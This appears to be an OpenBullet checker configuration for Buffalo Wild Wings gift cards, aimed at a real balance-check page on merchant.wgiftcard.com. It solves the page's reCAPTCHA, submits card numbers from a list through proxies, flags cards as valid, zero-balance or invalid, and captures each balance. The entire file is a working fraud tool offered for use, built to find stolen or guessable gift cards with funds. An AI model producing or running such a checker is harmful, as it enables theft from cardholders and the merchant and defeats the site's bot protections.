[SETTINGS]
{
  "Name": "BWW GC",
  "SuggestedBots": 1,
  "LastModified": "2018-09-05T12:42:16.387191+00:00",
  "AdditionalInfo": "",
  "Author": "v0ilawes",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
RECAPTCHA "https://merchant.wgiftcard.com/card/balance/checkBalance/buffalowildwings/1" "6LcmqwITAAAAAD_8PDdcM-9AhyftRNtFXn1U5e_8" -> VAR "captcha" 
REQUEST POST "https://merchant.wgiftcard.com/card/balance/checkBalance/buffalowildwings/1" AutoRedirect=TRUE 
  CONTENT "card_number=<USER>&card_pin=&g-recaptcha-response=<captcha>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://merchant.wgiftcard.com/card/balance/checkBalance/buffalowildwings/1" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "The balance of the Gift Card" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "0.00" 
  KEYCHAIN Failure OR 
    KEY "Invalid account number" 
PARSE "<SOURCE>" LR ";\">$" "<" Recursive=FALSE -> CAP "Balance" "" "" 
